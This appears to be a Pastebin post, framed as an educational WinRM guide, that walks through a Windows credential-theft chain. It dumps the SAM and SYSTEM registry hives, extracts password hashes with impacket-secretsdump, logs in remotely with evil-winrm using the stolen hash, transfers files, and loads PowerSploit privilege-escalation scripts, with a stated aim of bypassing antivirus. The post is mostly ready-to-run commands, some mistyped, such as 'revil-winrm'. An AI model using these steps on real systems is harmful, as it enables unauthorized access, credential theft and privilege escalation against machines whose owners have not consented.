Advertisement
efxtv

Mastering Windows Remote Management (WinRM): A Comprehensive Guide to Remote System Administration a

May 22nd, 2024 (edited)
100
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.17 KB | Cybersecurity | 0 0
  1. Hey there! 👋 Are you ready to dive into the world of Windows Remote Management (WinRM)? Let's explore how this powerful protocol empowers administrators to manage Windows systems remotely, right from the comfort of their desks!
  2.  
  3. ******************************************
  4. Telegram post https://t.me/efxtv2/3731
  5. ******************************************
  6.  
  7. 🚨 ⚠️ Disclaimer: This post is for educational purposes only. It aims to raise awareness about security vulnerabilities and help safeguard your systems. Unauthorized access to computer systems is illegal and unethical. Always seek permission before testing or analyzing systems you don't own. Due to limitations, we can't share videos here (we never evade Telegram T&C in any situation).
  8.  
  9. WinRM (Windows Remote Management) is a game-changer, allowing you to execute commands and scripts on remote systems without the hassle of physical access. It's like having a magic wand to perform various administrative tasks, from configuration to troubleshooting, all from a central location.
  10.  
  11. ⭐️ But wait, before we begin, let's ensure you're equipped with the right tools:
  12.  
  13. 1. reg.exe: Extract SAM and SYSTEM files (Exclusive for private users)
  14. 2. impacket-secretsdump: Get the hash from SAM and SYSTEM
  15. 3. evil-winrm: Login to Windows remotely
  16. 4. PowerShell: Execute commands and scripts
  17. 5. PowerSploit: Your arsenal for bypassing antivirus and more
  18.  
  19. Now, let's get started with some cool WinRM commands and tricks:
  20.  
  21. ⭐️ Copy the SAM and SYSTEM files to Kali Linux:
  22. reg.exe save hklm\sam SAM
  23. reg.exe save hklm\system SYSTEM
  24.  
  25.  
  26. ⭐️ Get the hash out of SAM and SYSTEM:
  27. impacket-secretsdump -sam $PWD/SAM -system $PWD/SYSTEM LOCAL
  28.  
  29.  
  30. ⭐️ Login to Windows using evil-winrm:
  31. revil-winrm -i 192.168.1.43 -u demo -H hashesddddddddddddlk
  32.  
  33.  
  34. ⭐️ After getting the shell, upload and download files:
  35. upload filename
  36. download filename
  37.  
  38.  
  39. ⭐️ Explore more with evil-winrm:
  40. Get-Process
  41. Whoami /groups
  42. menu
  43.  
  44.  
  45. ⭐️ Ready for some advanced techniques? Let's bypass antivirus like a pro:
  46.  
  47. ⭐️ Use PowerSploit to elevate privileges:
  48. git clone https://github.com/PowerShellMafia/PowerSploit.git
  49. revil-winrm -i 192.168.1.43 -u demo -H hashesddddddddddddlk -s ~/tools/PowerSploit/Privesc
  50.  
  51.  
  52. ⭐️ Unlock the full potential of WinRM with these admin commands:
  53. ⭐️ Enable WinRM service on Windows 10:
  54. Enable-PSRemoting -Force
  55.  
  56.  
  57. ⭐️ Check WinRM status:
  58. Get-Service WinRM
  59.  
  60.  
  61. ⭐️ Encountering errors? No worries! Here's how to fix them:
  62. ⭐️ Fix WinRM firewall exception error:
  63. - Change network connection type to Private
  64. Enable-PSRemoting -Force
  65. Get-Service WinRM
  66.  
  67.  
  68. ⭐️ Now, let's access Windows via CLI and GUI:
  69. ⭐️ CLI access with evil-winrm:
  70. evil-winrm -i 192.168.1.41 -u demo -p 'demo'
  71.  
  72.  
  73. ⭐️ GUI access with Remmina:
  74. sudo apt install remmina
  75. settings>system>rdp enable
  76. 192.168.1.41:3389
  77.  
  78.  
  79. ⭐️ Manage WinRM service:
  80. ⭐️ Stop WinRM service:
  81. Stop-Service -Name WinRM
  82.  
  83.  
  84. ⭐️ Check WinRM service status:
  85. Get-Service WinRM
  86.  
  87.  
  88. ⭐️ Start WinRM service:
  89. Start-Service -Name WinRM
  90.  
  91.  
  92. Unlock the full potential of WinRM and take your Windows management to the next level! 🚀🔒
  93.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement